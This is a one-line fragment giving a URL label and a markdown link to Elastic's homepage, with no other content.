URL: [https://www.elastic.co/](https://www.elastic.co/)